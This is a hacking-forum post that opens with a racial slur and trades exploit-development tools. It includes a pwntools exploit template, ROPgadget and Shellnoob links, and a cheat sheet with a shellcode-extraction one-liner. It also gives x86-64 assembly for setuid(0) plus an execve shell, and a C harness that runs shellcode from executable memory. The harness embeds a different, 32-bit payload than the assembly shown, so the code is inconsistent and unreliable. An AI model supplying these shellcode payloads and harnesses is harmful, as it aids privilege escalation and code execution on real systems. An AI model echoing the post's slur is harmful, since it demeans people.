Sup niggas, i was wondering if those of you who are so inclined would be willing to share any of the utilities, resources and/or tools you like to use when working with/on automating certain aspects of low level security. Yes i already have a debugger, multiple in fact(Including Radare2, looking at you Bueno). I also have an assembler, linker, compiler and a tool for static code analysis. But that's not really the type of tool i'm looking for or talking about.
I'm not sure if you're familiar but there's a Python tool/library that's useful in terms of exploit and payload development called pwntools. If you're interested just install it with `pip3 install pwntools`. Besides providing tools that'll let you patch ELF files from the CLI and having a built in disassembler among other things, when imported as a lib it allows you to do cool stuff like:
from pwn import *
# Set up pwntools for the correct architecture
context.update(arch='i386')
exe = './path/to/binary'
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
# Exploit goes here
io = start()
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
io.interactive()
This is the kind of tool i'm talking about. And since i don't just want to come here hat in hand i will share some of the stuff i like to use as well. Like ROPGadget.py which lets you search for gadgets in a binary. It supports several file formats and architectures and is pretty useful for ROPChaining.
git clone https://github.com/JonathanSalwan/ROPgadget.git
I also recently came across a tool called Shellnoob, which despite it's name is pretty 1337. Besides that though it's mostly very convenient because among other things it can convert between the following file types:
Supported input: asm, obj, bin, hex, c, shellstorm
Supported output: asm, obj, exe, bin, hex, c, completec, python, bash, ruby, pretty, safeasm
It can also NOP out fork() calls and patch executables has interactive ASM to opcode mode, resolves syscall numbers and supports both ATT and Intel syntax. Not to mention it was accepted for Blackhat Arsenal, which gives it some serious street cred if you ask me.
git clone https://github.com/reyammer/shellnoob.git
Personally i like to keep a little cheatsheet handy in order to remember some useful Linux utilities related to what we are talking about.
# Dump hex first 128 bytes
xxd -l 128 <filename>
# Dump binary first 128 bytes
xxd -b -l 128 <filename>
# Dump c-style header first 128 bytes at a 256-bytes offset
xxd -i -s 256 -l 128 <filename>
# Check relocations inside the object file
readelf --relocs <filename>.o
# Dump all headers
readelf --headers <filename>
# Dump everything
readelf --all <filename>
# List symbols from object file
nm <filename>
# List and demangle dynamic symbols from stripped object file
nm -D --demangle <filename>
# Get preprocessing output
gcc -E -P <source_file>.c > <preprocessing_output>.i
# Add current path to the linker environment
linker=$(export LD_LIBRARY_PATH=`pwd`)
# Trace SysCalls
strace <filename> `ltrace -i -C <filename>`
# Simple disassembly of an object file
objdump -M intel -d <filename>.o
# Extract shellcode from .sc or .o/.obj file
objdump -d $filename | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: |cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
If you got anything to add to the cheatsheet, please do. That last one is particularly useful. If you take the below Assembly(ATT).
global _start
section .text
_start:
; setuid(0)
xor edi,edi
push rdi ; null terminator for the following string
push 105
pop rax
; push /bin//sh in reverse
mov rbx,0xd0e65e5edcd2c45e
syscall
; execve
ror rbx,1
mov al,59
push rbx
xchg esi,edi
push rsp
cdq
; store /bin//sh address in RDI, points at string
pop rdi
; Call the Execve syscall
syscall
Compile it with NASM like so:
nasm -felf64 XorSh.nasm -o XorSh.o && ld XorSh.o -o XorSh
You can now either run the compiled ELF binary `./XorSh` or extract shellcode from the object file and use it to inject it with Python, or use it as payload in a C program. If you extract the shellcode you can use the below C program to test it.
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/mman.h>
/* should be enough to hold your shellcode, if not just set this to a higher value */
#define BUFSIZE 4096
/* set to 1 to enable debugging, will break before executing the shellcode */
#define DEBUGGING 0
/* either paste your shellcode in here ... */
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char* argv[])
{
size_t len;
char *buf, *ptr;
printf("[*] Allocating executable memory...\n");
buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
ptr = buf;
printf("[+] Buffer @ %p\n", buf);
#if DEBUGGING
ptr[0] = '\xcc';
ptr++;
#endif
/* ... or pass it as filename to the program */
if (argc > 1) {
printf("[*] Reading shellcode from file...\n");
FILE *f = fopen(argv[1], "r");
if (!f) {
fprintf(stderr, "[-] Cannot open %s: %s\n", argv[1], strerror(errno));
exit(-1);
}
len = fread(ptr, 1, BUFSIZE, f);
fclose(f);
} else {
len = sizeof(shellcode);
printf("[*] Copying shellcode...\n");
memcpy(ptr, shellcode, len);
}
printf("[+] Done, size of shellcode: %i bytes\n", len);
printf("[*] Jumping into shellcode...\n\n");
(*(void (*)()) buf)();
return 0;
}
It would also be pretty easy to adjust the above program to just run the shellcode, but you might as well just run the ELF binary i guess. Anyway, if you have anything to add provided it's along the lines of what i posted please do so.
If you have something really special, like a tool you coded yourself that's particularly useful with regards to this stuff. I may trade you something special in return. I have a closed source Windows tool, complete with GUI that automates finding ROPGadgets and making ROPChains, it's not for sale anywhere, and only a few people have this tool. It's excellent for exploit development targeting Windows. I will send you the source files for this tool if you have something special to trade for it.
